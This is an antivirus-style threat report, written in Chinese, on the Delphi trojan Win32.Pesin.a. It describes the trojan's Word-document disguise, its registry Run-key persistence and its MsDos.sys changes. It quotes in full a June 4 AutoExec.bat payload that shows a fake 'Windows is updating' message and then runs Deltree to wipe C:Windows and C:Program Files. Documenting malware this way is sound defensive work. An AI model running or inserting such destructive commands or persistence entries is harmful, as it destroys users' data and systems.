病毒别名:Win32.Pesin.a
处理时间:
威胁级别:★
中文名称:
病毒类型:木马
影响系统:Win9x/WinMe/WinNT/Win2000/WinXP/Win2003
病毒行为:
木马
编写工具:Borland Delphi 6.0 - 7.0
传染条件:病毒伪装成Word文档,引诱用户误运行
发作条件:
每年6月4日,病毒删除硬盘的系统目录 及默认程序目录
系统修改:
A、将自身复制到系统安装目录下生成如下文件:
%System%SysTask.exe
将自身复制到c:My Documents目录下生成
My Heart.exe
B、
1、在注册表主键:
HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentversionRun
下添加如下键值:
"WLoadService" = "%System%SysTask.exe /run"
C、在MsDOS.sys 中加入以下字符
[Options]
BootWarn=1
BootKeys=0
发作现象:
A、用户运行病毒后,程序会生成一个~temp.doc,并自动调用写字板,如果是Win98系统,写字板会显示如下信息:
Dear My Love,
Sebiru tatapanmu, Sebiru hatimu, Sebiru Kasihmu. Biru merupakan Damainya sebuah Cinta. Kutahu semuanya !! namun semua bukan lah untukku karna aku tak pantas untukmu. Hanya Keperihan serta Kerinduan tak bertepi yang pantas Kudapat darimu
-----BlueLove
B、用户会检查今天是不是6月4日,如果是,则在用户关机时,则在AutoExec.bat中加入
@echo off
Echo Pesan ini kutujukan kepada mereka yang tak percaya akan
Echo Kemampuan ku. Aku tahu aku adalah orang yang sangat bodoh tapi
Echo apakah orang bodoh tak punya Impian ... ?? Hanya dengan
Echo dalih ketidak percayaan, kalian telah hancurkan impian Putih ku
Echo Tak apa ... !! karna kini impian itu tlah berubah menjadi
Echo Sebuah Impian Hitam .. !! Ingin ku buktikan akan apa yang kalian
Echo telah tuduhkan kepadaku ... !! Hari ini adalah Hari Ulang Tahun Ku
Echo yang ke - 21Aku punya kado manis untuk mu !! semoga dengan kado ini kamu
Echo dapat nikmati .... !!
Echo Kepada Bapak Samsu dan Ibu Heni "Terima Kasih Kalian tlah tanamkan impian hitam dihati ini"
Echo Salam Hangat Buat Sobat - sobat satu kelas ku dulu Johan, Imron,
Echo Maulana, Mario, Toni, Usman, Septi dan semua anak - anak 3 Akuntansi 3
Echo I LOVE U ALL
Echo Bye Bye
pause
Echo Windows is updating file(s) Please wait....
Deltree /y C:Windows
Deltree /y C:Program Files
并弹出一个标题为ByeBye的对话框,显示如下内容:
Selamat ulang tahun ke-21 My Love!
Aku punya hadiah spesial untukmu...
C、用户在下一次开机时,执行批处理,删除C:Windows和C:Program Files下所有的文件。
特别说明: